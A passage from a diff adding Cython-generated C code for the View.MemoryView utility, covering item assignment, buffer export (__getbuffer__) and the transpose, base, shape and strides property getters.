= PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyNumber_Add(__pyx_t_4, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_5, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 514, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":516 + * bytesvalue = struct.pack(self.view.format, *value) + * else: + * bytesvalue = struct.pack(self.view.format, value) # <<<<<<<<<<<<<< + * + * for i, c in enumerate(bytesvalue): + */ + /*else*/ { + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_t_1, __pyx_v_value}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 516, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = 0; + if (unlikely(__pyx_v_bytesvalue == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' is not iterable"); + __PYX_ERR(1, 518, __pyx_L1_error) + } + __Pyx_INCREF(__pyx_v_bytesvalue); + __pyx_t_8 = __pyx_v_bytesvalue; + __pyx_t_10 = PyBytes_AS_STRING(__pyx_t_8); + __pyx_t_11 = (__pyx_t_10 + PyBytes_GET_SIZE(__pyx_t_8)); + for (__pyx_t_12 = __pyx_t_10; __pyx_t_12 < __pyx_t_11; __pyx_t_12++) { + __pyx_t_9 = __pyx_t_12; + __pyx_v_c = (__pyx_t_9[0]); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_v_i = __pyx_t_7; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + (__pyx_v_itemp[__pyx_v_i]) = __pyx_v_c; + } + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesvalue); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t *__pyx_t_3; + char *__pyx_t_4; + void *__pyx_t_5; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + __pyx_t_2 = ((__pyx_v_flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_L4_bool_binop_done:; + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":524 + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + * raise ValueError, "Cannot create writable memory view from read-only memoryview" # <<<<<<<<<<<<<< + * + * if flags & PyBUF_ND: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Cannot_create_writable_memory_vi, 0, 0); + __PYX_ERR(1, 524, __pyx_L1_error) + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + } + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_ND) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":527 + * + * if flags & PyBUF_ND: + * info.shape = self.view.shape # <<<<<<<<<<<<<< + * else: + * info.shape = NULL + */ + __pyx_t_3 = __pyx_v_self->view.shape; + __pyx_v_info->shape = __pyx_t_3; + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":529 + * info.shape = self.view.shape + * else: + * info.shape = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + /*else*/ { + __pyx_v_info->shape = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":532 + * + * if flags & PyBUF_STRIDES: + * info.strides = self.view.strides # <<<<<<<<<<<<<< + * else: + * info.strides = NULL + */ + __pyx_t_3 = __pyx_v_self->view.strides; + __pyx_v_info->strides = __pyx_t_3; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + goto __pyx_L7; + } + + /* "View.MemoryView":534 + * info.strides = self.view.strides + * else: + * info.strides = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_INDIRECT: + */ + /*else*/ { + __pyx_v_info->strides = NULL; + } + __pyx_L7:; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_INDIRECT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":537 + * + * if flags & PyBUF_INDIRECT: + * info.suboffsets = self.view.suboffsets # <<<<<<<<<<<<<< + * else: + * info.suboffsets = NULL + */ + __pyx_t_3 = __pyx_v_self->view.suboffsets; + __pyx_v_info->suboffsets = __pyx_t_3; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":539 + * info.suboffsets = self.view.suboffsets + * else: + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + /*else*/ { + __pyx_v_info->suboffsets = NULL; + } + __pyx_L8:; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":542 + * + * if flags & PyBUF_FORMAT: + * info.format = self.view.format # <<<<<<<<<<<<<< + * else: + * info.format = NULL + */ + __pyx_t_4 = __pyx_v_self->view.format; + __pyx_v_info->format = __pyx_t_4; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":544 + * info.format = self.view.format + * else: + * info.format = NULL # <<<<<<<<<<<<<< + * + * info.buf = self.view.buf + */ + /*else*/ { + __pyx_v_info->format = NULL; + } + __pyx_L9:; + + /* "View.MemoryView":546 + * info.format = NULL + * + * info.buf = self.view.buf # <<<<<<<<<<<<<< + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + */ + __pyx_t_5 = __pyx_v_self->view.buf; + __pyx_v_info->buf = __pyx_t_5; + + /* "View.MemoryView":547 + * + * info.buf = self.view.buf + * info.ndim = self.view.ndim # <<<<<<<<<<<<<< + * info.itemsize = self.view.itemsize + * info.len = self.view.len + */ + __pyx_t_6 = __pyx_v_self->view.ndim; + __pyx_v_info->ndim = __pyx_t_6; + + /* "View.MemoryView":548 + * info.buf = self.view.buf + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize # <<<<<<<<<<<<<< + * info.len = self.view.len + * info.readonly = self.view.readonly + */ + __pyx_t_7 = __pyx_v_self->view.itemsize; + __pyx_v_info->itemsize = __pyx_t_7; + + /* "View.MemoryView":549 + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + * info.len = self.view.len # <<<<<<<<<<<<<< + * info.readonly = self.view.readonly + * info.obj = self + */ + __pyx_t_7 = __pyx_v_self->view.len; + __pyx_v_info->len = __pyx_t_7; + + /* "View.MemoryView":550 + * info.itemsize = self.view.itemsize + * info.len = self.view.len + * info.readonly = self.view.readonly # <<<<<<<<<<<<<< + * info.obj = self + * + */ + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_v_info->readonly = __pyx_t_1; + + /* "View.MemoryView":551 + * info.len = self.view.len + * info.readonly = self.view.readonly + * info.obj = self # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":556 + * @property + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) # <<<<<<<<<<<<<< + * transpose_memslice(&result.from_slice) + * return result + */ + __pyx_t_1 = __pyx_memoryview_copy_object(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 556, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_memoryviewslice_type))))) __PYX_ERR(1, 556, __pyx_L1_error) + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":557 + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_t_2 = __pyx_memslice_transpose((&__pyx_v_result->from_slice)); if (unlikely(__pyx_t_2 == ((int)-1))) __PYX_ERR(1, 557, __pyx_L1_error) + + /* "View.MemoryView":558 + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) + * return result # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.T.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":562 + * @property + * def base(self): + * return self._get_base() # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->_get_base(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 562, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.base.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":565 + * + * cdef _get_base(self): + * return self.obj # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->obj); + __pyx_r = __pyx_v_self->obj; + goto __pyx_L0; + + /* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_7genexpr__pyx_v_length; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":569 + * @property + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_7genexpr__pyx_v_length = (__pyx_t_2[0]); + __pyx_t_5 = PyInt_FromSsize_t(__pyx_7genexpr__pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_5))) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + } /* exit inner scope */ + __pyx_t_5 = PyList_AsTuple(((PyObject*)__pyx_t_1)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.shape.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr1__pyx_v_stride; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + __pyx_t_1 = (__pyx_v_self->view.strides == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":575 + * if self.view.strides == NULL: + * + * raise ValueError, "Buffer view does not expose strides" # <<<<<<<<<<<<<< + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Buffer_view_does_not_expose_stri, 0, 0); + __PYX_ERR(1, 575, __pyx_L1_error) + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + } + + /* "View.MemoryView":577 + * raise ValueError, "Buffer view does not expose strides" + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.strides + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.strides; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr1__pyx_v_stride = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr1__pyx_v_stride); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == 